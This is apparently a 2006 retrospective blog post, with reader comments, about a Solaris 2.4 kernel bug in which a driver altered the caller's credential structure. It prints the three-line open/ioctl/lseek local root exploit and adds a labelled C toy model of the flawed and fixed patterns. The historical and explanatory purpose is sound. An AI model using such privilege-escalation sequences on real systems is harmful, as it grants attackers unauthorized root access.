This Old Vulnerability, Memento Style
Dave G. | April 3rd, 2006 | Filed Under: This Old Vulnerability
They bang the gong for this one! I am going to tell the story of this Solaris 2.4 kernel vulnerability in reverse order.
First, let's look at the comment from the exploit:
/* If a tty port that is writeable by the user and owned by root is opened and the I_PUSH "ms" ioctl call made followed by an lseek the effective uid of the user is changed to root. */
I think I just dumped core.
Let's see what the folks on bugtraq had to say. Consolidating Casper Dik and jsz, we get:
The problem is that the code uses and changes the user’s cred structure, instead of allocating a new one (which is what happens in Solaris 2.2 and earlier). … But seriously, as someone has already said, the bug is in one of the routines of the driver in the kernel, which passes a pointer to u-cred structure and the routine actually modifies the uid and gid (euid & egid as well) to zero.
Finally, let's look at the three-line kernel exploit:
fd = open("/dev/ttyb", O_RDWR);   /* root-owned tty port that the user can write to */
ioctl(fd, I_PUSH, "ms");          /* push the "ms" STREAMS module onto the stream */
lseek(fd, 0, 1);                  /* whence 1 == SEEK_CUR; triggers the cred modification */
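To make the bugtraq explanation concrete, here is an added toy model in C (not code from the original post, nor Solaris source): a driver routine that writes root ids through the caller's shared cred pointer, beside the allocate-a-copy pattern the thread says 2.2 and earlier used. The struct layouts and the two driver routines are hypothetical stand-ins.

```c
#include <stdlib.h>
#include <string.h>

/* Toy model of a per-process credential record (not Solaris's real cred_t). */
struct cred { unsigned uid, gid, euid, egid; };

/* A process holds a pointer to its cred; that record may be shared. */
struct proc { struct cred *p_cred; };

static struct cred *cred_alloc(unsigned uid, unsigned gid) {
    struct cred *c = malloc(sizeof *c);
    if (!c) abort();
    c->uid = c->euid = uid;
    c->gid = c->egid = gid;
    return c;
}

/* Buggy pattern, as described on bugtraq: the driver routine is handed the
 * caller's cred pointer and clears uid/gid in place for its own privileged
 * work, so the change lands in the process's real credentials. */
static void buggy_driver_need_root(struct cred *cr) {
    cr->uid = cr->euid = cr->gid = cr->egid = 0;
}

/* Fixed pattern (what 2.2 and earlier did): duplicate the cred and modify
 * only the private copy; the process's own record never changes. */
static struct cred *fixed_driver_need_root(const struct cred *cr) {
    struct cred *priv = malloc(sizeof *priv);
    if (!priv) abort();
    memcpy(priv, cr, sizeof *priv);
    priv->uid = priv->euid = priv->gid = priv->egid = 0;
    return priv;
}

/* Each scenario returns the unprivileged caller's euid after the driver call. */
unsigned euid_after_buggy(void) {
    struct proc p = { cred_alloc(1001, 100) };
    buggy_driver_need_root(p.p_cred);
    unsigned e = p.p_cred->euid;
    free(p.p_cred);
    return e;                       /* 0: the caller is now root */
}

unsigned euid_after_fixed(void) {
    struct proc p = { cred_alloc(1001, 100) };
    struct cred *priv = fixed_driver_need_root(p.p_cred);
    unsigned e = p.p_cred->euid;
    free(priv);
    free(p.p_cred);
    return e;                       /* 1001: the caller is unchanged */
}
```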
blog
April 8th, 2006 11:15 pm
Dang. I don't remember that one (and it's a good one!). Then again, they were coming fast and furious back then. Glad I waited until 2.6. :^)
Chris Walsh | 04.03.06 - 2:34 pm | #
I thought Cliff showed me this one in his office in Sept. 1994; there were several such found by Brad Powell and others during this time period, internal to SunSoft and industrial relations groups. I was in the process of linting the 2.4 sources that summer of 1994, when I was first hired into Internet architecture at Sun. Most of them tended to be exercised by writing code in the debugger and running that.
Fun times; brings back a lot of memories, including Cliff's packet gen program, Steve Sparker's packet shell in Tcl, and other fun stuff.
All of which we used to "strengthen" the 2.4-2.5 series of kernels against the attacks coming online (BTW Sumitomo ran an older version of SunOS with buggy sequence number gen) (MD5 as a source of sequence numbers was introduced in 2.4-2.5 (Bob Gilligan's preference; my first choice was BBS (Blum Blum Shub; check "Applied Crypto" (nowadays I would look at Whirlpool hashes)))).
an old sunsoft kid
someone from that era at build | 04.07.06 - 6:40 pm | #
tqbf
April 9th, 2006 1:25 pm
Packet shell inspired CAPE, which was the precursor for CASL. I think Steve actually got it right with the Tcl extension, because I write packet code in Python all the time now and can count on zero fingers the number of times I've used CASL in the last year.
Did Brad Powell actually find bugs? I had him pegged as a sort of liaison type.